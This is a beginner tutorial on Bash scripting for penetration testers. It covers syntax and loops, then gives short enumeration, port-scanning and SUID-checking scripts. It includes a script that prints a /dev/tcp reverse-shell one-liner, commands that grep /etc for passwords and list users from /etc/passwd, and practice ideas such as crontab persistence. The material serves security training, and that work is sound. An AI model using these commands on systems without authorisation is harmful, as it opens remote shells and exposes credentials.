Bash Scripting for Pentesters

Table of Contents

What is Bash?
Why Pentesters Should Learn Bash
Setting Up Your First Script
Bash Syntax Basics
Variables and User Input
Conditional Statements (if/else)
Loops (for, while)
Functions in Bash
Useful Built-in Commands
Writing Your First Useful Pentesting Scripts
Automating Enumeration Tasks
Real-World Pentest Script Examples
Tips, Tricks, and Gotchas
Practice Challenges

1. What is Bash?

Bash (Bourne Again SHell) is a shell and scripting language for Linux. It lets you run commands, automate tasks, and build logic — all from the terminal.

2. Why Pentesters Should Learn Bash

Automate enumeration & exploitation
Script post-exploitation tasks
Stay stealthy and avoid noisy tools
Work efficiently in low-resource environments

3. Setting Up Your First Script

nano myscript.sh             # Create a new script file

#!/bin/bash                  # Shebang - tells the OS to use bash to interpret the script

chmod +x myscript.sh         # Make the script executable

./myscript.sh                # Run the script

4. Bash Syntax Basics

echo "Hello, world!"         # Prints text to the terminal

# This is a comment          # Comments are ignored by Bash, use them to explain your code

ls -la                       # List all files with details
whoami                       # Show the current user

5. Variables and User Input

name="Wilko"                 # Assign a value to a variable

echo "Hello, $name"          # Print variable value

read -p "Enter your target IP: " ip    # Prompt user for input
echo "Scanning $ip now..."             # Use that input in your script

6. Conditional Statements (if/else)

if [ "$USER" == "root" ]; then         # Check if current user is root
  echo "You're root!"                  # If true, print message
else
  echo "You're not root."              # If false, print alternative message
fi

7. Loops (for, while)

For Loop

for ip in 10.10.1.{1..10}; do          # Loop through a range of IPs
  ping -c 1 $ip                        # Ping each IP once
done

While Loop

count=1                                # Start count at 1
while [ $count -le 5 ]; do             # Loop while count is less than or equal to 5
  echo "Try $count"                    # Print attempt number
  ((count++))                          # Increment count
done

8. Functions in Bash

function say_hi() {                    # Define a function
  echo "Hi, hacker!"                   # Function body
}

say_hi                                 # Call the function

9. Useful Built-in Commands

Command	Purpose
`whoami`	Shows current user
`hostname`	Displays system’s hostname
`ifconfig` / `ip a`	Shows network interface configuration
`netstat -tunlp`	Lists open ports and associated services
`ps aux`	Displays all running processes
`find / -name "file"`	Searches for files starting from root
`grep "text" file`	Searches for text inside a file
`cut -d: -f1 /etc/passwd`	Extracts usernames from passwd file
`awk '{print $1}'`	Prints first column of input

10. Writing Your First Useful Pentesting Scripts

Basic Enumeration Script

#!/bin/bash
echo "[*] Basic Enumeration on $HOSTNAME"             # Print system name
echo "Current User: $(whoami)"                        # Show current user
echo "Home Directory: $HOME"                          # Print home directory
echo "[*] Checking for SUID binaries:"
find / -perm -4000 -type f 2>/dev/null                # Find all SUID binaries

Reverse Shell Generator

#!/bin/bash
read -p "Enter your IP: " ip                          # Ask for attacker's IP
read -p "Enter your port: " port                      # Ask for port
echo "bash -i >& /dev/tcp/$ip/$port 0>&1"             # Print a reverse shell command

11. Automating Enumeration Tasks

#!/bin/bash
echo "[*] Gathering info..."

echo "[+] Users:"
cut -d: -f1 /etc/passwd                               # List all usernames

echo "[+] Network Info:"
ip a                                                  # Show IP info

echo "[+] Processes:"
ps aux | head -n 10                                   # Show top 10 running processes

echo "[+] Looking for passwords:"
grep -r "password" /etc 2>/dev/null                   # Search for the word "password"

12. Real-World Pentest Script Examples

Simple Port Scanner

#!/bin/bash
read -p "Target IP: " ip                              # Ask user for IP

for port in {20..1024}; do                           
  (echo >/dev/tcp/$ip/$port) >/dev/null 2>&1 && echo "Port $port is open"  
done

Check for SUID Exploits

#!/bin/bash
echo "[*] Checking for exploitable SUID files..."

find / -perm -4000 -type f 2>/dev/null | while read file; do    # Find SUID files
  echo "Found: $file"
  strings $file | grep "/bin/sh"                                
done

13. Tips, Tricks, and Gotchas

✅ Always quote variables: "$var" → avoids bugs with spaces
✅ Add set -x at the top for debugging
✅ Redirect unwanted output: 2>/dev/null hides errors
✅ Use functions to keep things tidy and reusable
✅ Always test scripts in a safe environment

14. Practice Challenges

Try building scripts for:

Auto enumeration on a target box
Local privilege escalation checks
Quick pivoting (SSH tunnels or SOCKS)
Crontab persistence setup
Base64 encoding/decoding files